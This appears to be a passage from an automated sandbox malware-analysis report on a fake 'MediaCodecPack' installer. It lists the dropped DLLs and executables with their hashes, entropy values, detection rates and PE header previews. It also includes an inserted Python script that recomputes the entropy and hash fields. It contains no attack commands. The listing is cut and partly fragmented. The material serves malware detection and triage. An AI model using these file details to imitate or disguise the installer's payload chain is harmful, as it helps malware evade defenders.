                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: steel.exe.2.exe, Detection: malicious, Browse
                                                                                          • Filename: stories.exe.2.exe, Detection: malicious, Browse
                                                                                          • Filename: basx.exe, Detection: malicious, Browse
                                                                                          • Filename: list.exe, Detection: malicious, Browse
                                                                                          • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                          • Filename: stail.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                          • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:ISO-8859 text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:nP/l:l
                                                                                          MD5:C337052FD7E70F9F7B4215130969A8E2
                                                                                          SHA1:68C67B8E77F679E1CE8365015F11516B6B9FCB89
                                                                                          SHA-256:99B1C2D9E514AD6052A9A12DE9B055AF9C15E966CBE5402D3961BF64A74FE966
                                                                                          SHA-512:81B30784E9C539E55512502E949E8FED7BC558E77BC11F87175DF8566C4E0E4EBC469F1CF274BBD865220D384BE03F0EF07D2224D2534D0BE14843BB2C7DC3D3
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:.+cg....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:2B197A84C60EC779B10736BB6475B5E9
                                                                                          SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
                                                                                          SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
                                                                                          SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.9012093522336393
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                          MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                          SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                          SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                          SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
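The Entropy (8bit) field in each dropped-file entry is the Shannon entropy of the file's byte-value distribution in bits per byte, and the MD5/SHA1/SHA-256/SHA-512 fields are plain digests of the file contents. The Python below is an added example, not code from the report, that recomputes these fields and checks the entropy against the value given for the 128-byte file directly above. The file contents are reconstructed from the preview (an assumption): the 64 hex characters shown, followed by 64 non-printable bytes the preview renders as dots, taken here as NUL. Any single repeated padding byte yields the same distribution and therefore the same entropy, so that check holds whatever the padding is; the digests would match the report's only if the padding guess is exact, so they are computed but not compared. The 4-byte file's 0.8112781244591328 is likewise the entropy of a 3:1 split between two byte values, which the example also verifies.

```python
"""Recompute the Entropy (8bit) and hash fields shown for each dropped file.

Added example; not code from the Joe Sandbox report.
"""
import hashlib
import math
from collections import Counter
from typing import Dict


def entropy_bits_per_byte(data: bytes) -> float:
    """Shannon entropy of the byte-value distribution: 0.0 (one value) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> Dict[str, object]:
    """The size, entropy and digest fields of a dropped-file entry.

    SSDEEP is omitted: it needs the external ssdeep library.
    """
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy_bits_per_byte(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


# Reconstruction (assumption) of the 128-byte dropped text file: the 64 hex characters
# shown in the report preview, then 64 non-printable bytes the preview renders as dots.
# NUL padding is assumed; any single repeated byte gives the same entropy.
HEX_STRING = b"12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56"
RECONSTRUCTED_128 = HEX_STRING + b"\x00" * 64
REPORTED_ENTROPY_128 = 2.9012093522336393   # Entropy (8bit) from the report entry above

# The 4-byte dropped file (Entropy 0.8112781244591328): three bytes of one value, one of another.
# The actual byte values are not recoverable from the preview; this is a representative input.
REPRESENTATIVE_4 = b"\x00\x00\x00\x01"
REPORTED_ENTROPY_4 = 0.8112781244591328


def matches_reported_entropy(data: bytes, reported: float) -> bool:
    """True when the recomputed entropy agrees with the report to floating-point precision."""
    return math.isclose(entropy_bits_per_byte(data), reported, abs_tol=1e-9)


if __name__ == "__main__":
    for field, value in describe(RECONSTRUCTED_128).items():
        print(f"{field}: {value}")
    print("128-byte entropy matches report:", matches_reported_entropy(RECONSTRUCTED_128, REPORTED_ENTROPY_128))
    print("4-byte entropy matches report:", matches_reported_entropy(REPRESENTATIVE_4, REPORTED_ENTROPY_4))
```

Whole-file values of roughly 6.4 to 6.8 bits per byte, as for the PE files in this report, are ordinary for uncompressed native code and resources; a whole-file value approaching 8.0 is the usual heuristic for a packed or encrypted payload, but compressed container formats score high too (the CHM help file above sits at 7.69 and is a legitimate archive), so entropy is a triage signal to be read alongside section headers, not a verdict on its own.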
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383117784462356
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:GJMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:GGLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:9D87A2B2BA8C6C1F180D537F1CB15C77
                                                                                          SHA1:153B53AAB3961F1A375539B16C92DC4A24711113
                                                                                          SHA-256:108138BC31E7805BC683723B54CF68C3BDF821BE3D36D9A191200ED04AF1E3EC
                                                                                          SHA-512:E440874A464A64BDDAAB6ABB28B07C579B515D3C6D49DBBD9A99BEACF32EA1407EADCC828159AA90D547FAFA1F6D0D93DCC42A5E1AE6B1B620C34D665615F2CD
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmp, Author: Joe Security
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383118190067132
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:1JMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:1GLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          SHA1:540F6CCD18A0896D96FC711A0DD4C27F6C2E7403
                                                                                          SHA-256:3073D7435C4ECB43BA08C28D1238A05853379815C2F967575DEB6DF43937A1AC
                                                                                          SHA-512:067EFBF5E8A092C73F852A15A9E950D992D6018F08285481162310712F74169DE61BB14DC6A133681484CBAA6C6E7CDF0E54BA411737F3A901FB0BBFEA768F4C
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.51490177808013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                          MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                          SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                          SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                          SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:InnoSetup Log MediaCodecPack, version 0x30, 4704 bytes, 571345\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                                          Category:dropped
                                                                                          Size (bytes):4704
                                                                                          Entropy (8bit):4.735495052164898
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:U2jdWO38DpTlIHu39V+eOIh/ia7ICSss/LnzU2xn6oXJWyJgFAcP2:U2jdWO3opTl4HIh/NICSsAnzU2x6oXJj
                                                                                          MD5:DC55513B4A636F61F166FBAF93CA44E4
                                                                                          SHA1:ED8B86138CEF44FA453D057CB6743EEEBC0B9CE5
                                                                                          SHA-256:466128CB7E68F95F60133CC77BFA2DFD5E9248B096A66709A25364F223518C8A
                                                                                          SHA-512:4EDF57C52EC01D2748596D18F09EEFB9B574AA672EDC3E4F8C564F7C01FBE9BE47479BA928D4B2F258322F32F6FE80B9F79FFD225FB284624705FA25F9DE5225
                                                                                          Malicious:false
                                                                                          Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......`...%................................................................................................................c.|.........'.U......T....571345.user3C:\Users\user\AppData\Local\MediaCodecPack 1.0.11...............G.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:Us
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.51490177808013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                          MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                          SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                          SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                          SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\Hbq580QZAR.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):706560
                                                                                          Entropy (8bit):6.506374420963084
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
                                                                                          MD5:ED6A19AD054AD0172201AF725324781B
                                                                                          SHA1:817F409DBE431AE71D3AB4D70181257C3BEE4DBD
                                                                                          SHA-256:79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
                                                                                          SHA-512:D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.289297026665552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                          MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                          SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                          SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                          SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23312
                                                                                          Entropy (8bit):4.596242908851566
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
